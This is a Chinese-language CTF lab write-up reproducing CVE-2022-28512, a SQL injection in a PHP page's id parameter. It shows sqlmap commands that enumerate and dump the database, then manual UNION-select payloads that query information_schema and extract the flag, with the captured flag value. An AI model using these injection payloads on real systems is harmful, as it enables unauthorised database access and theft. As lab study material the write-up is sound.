i春秋云镜 CVE-2022-28512 漏洞复现笔记-526互联

sqlmap工具注入

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch --current-db -p"id"

得到库名
[13:53:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:53:03] [INFO] fetching current database
current database: 'ctf'

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch -D ctf --tables

看到关键flag表

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch -D ctf -T flag --columns

得到字段名

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch -D ctf -T flag -C flag --dump

拿到flag值
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{ba07fcfd-14cb-4bde-af09-18458b4eb7ed}

手工注入：
id=4' order by 10 --+ 报错
id=4' union select 1,2,3,4,5,6,7,8,9 --+ 4是回显点
id=-4' union select 1,2,3,database(),5,6,7,8,9 --+ 当前数据库名是ctf

开始跑表名
id=-4' union select 1,2,3,table_name ,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 0,1 --+ titles
id=-4' union select 1,2,3,table_name ,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 1,1 --+ page_hits
,,,,,,,,
,,,,,,,,
id=-4' union select 1,2,3,table_name ,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 10,1 --+ flag(关键表)

/* 或是直接用 id=-4' union select 1,2,3,group_concat(table_name) ,5,6,7,8,9 from information_schema.tables where table_schema=database() --+
这句跑也能找到*/

开始跑字段名
id=-4' union select 1,2,3,column_name ,5,6,7,8,9 from information_schema.columns where table_name='flag' limit 0,1 --+ flag(关键字段)

跑数据
id=-4' union select 1,2,3,flag ,5,6,7,8,9 from flag --+
得到flag：
flag{ba07fcfd-14cb-4bde-af09-18458b4eb7ed}